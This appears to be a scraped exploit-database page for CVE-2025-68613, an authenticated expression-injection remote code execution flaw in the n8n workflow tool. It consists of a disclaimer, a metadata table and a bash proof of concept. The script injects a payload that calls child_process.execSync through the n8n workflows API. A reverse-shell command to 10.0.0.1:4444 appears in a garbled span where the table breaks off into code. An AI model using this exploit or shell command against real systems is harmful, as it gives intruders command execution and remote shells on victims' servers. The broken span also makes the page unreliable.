Share
## https://sploitus.com/exploit?id=01254827-D3B8-5150-A7C6-141E820309CB
# n8n Authenticated Expression Injection RCE โ€“ CVE-2025-68613


  Critical Remote Code Execution (CVSS 9.9) in n8n Workflow Automation Tool
  Proof of Concept โ€“ For educational and authorized security research use only


---

### โš ๏ธ Important Legal Warning

**This code is provided STRICTLY for educational purposes and authorized security testing in controlled lab environments.**

**Unauthorized use on production systems or any system without explicit written permission is illegal** and violates computer misuse and cybersecurity laws in most jurisdictions.

**Use at your own risk. The author is not responsible for any misuse.**

---

### Vulnerability Information

| Field                        | Details                                                                   |
|------------------------------|---------------------------------------------------------------------------|
| Exploit Title                | n8n Authenticated Expression Injection Remote Code Execution             |
| CVE                          | [CVE-2025-68613](https://nvd.nist.gov/vuln/detail/CVE-2025-68613)         |
| Disclosure Date              | 2025-12-25                                                                |
| Author                       | Mohammed Idrees Banyamer                                                  |
| Author Country               | Jordan                                                                    |
| Contact / Social             | Instagram: [@banyamer_security](https://instagram.com/banyamer_security) |
| GitHub                       | [mbanyamer](https://github.com/mbanyamer)                                 |
| Vendor                       | [n8n.io](https://n8n.io)                                                  |
| Software Repository          | [github.com/n8n-io/n8n](https://github.com/n8n-io/n8n)                    |
| Vulnerable Versions          | โ‰ฅ 0.211.0 =0.211.0 & /dev/tcp/10.0.0.1/4444 0>&1"

PAYLOAD="{{ (function(){ return this.process.mainModule.require('child_process').execSync('${CMD}').toString() })() }}"

echo "[*] Sending malicious workflow to ${TARGET}"

curl -s -X POST "${TARGET}/rest/workflows" \
  -H "Content-Type: application/json" \
  -H "X-N8N-API-KEY: ${API_KEY}" \
  -d '{
    "name": "CVE-2025-68613 PoC",
    "active": false,
    "nodes": [
      {
        "parameters": {
          "values": {
            "string": [
              {
                "name": "result",
                "value": "'${PAYLOAD}'"
              }
            ]
          }
        },
        "name": "Exploit",
        "type": "n8n-nodes-base.set",
        "typeVersion": 1,
        "position": [460, 300]
      }
    ],
    "connections": {}
  }'

echo -e "\n[!] Check n8n logs or the output node in the created workflow for command result\n"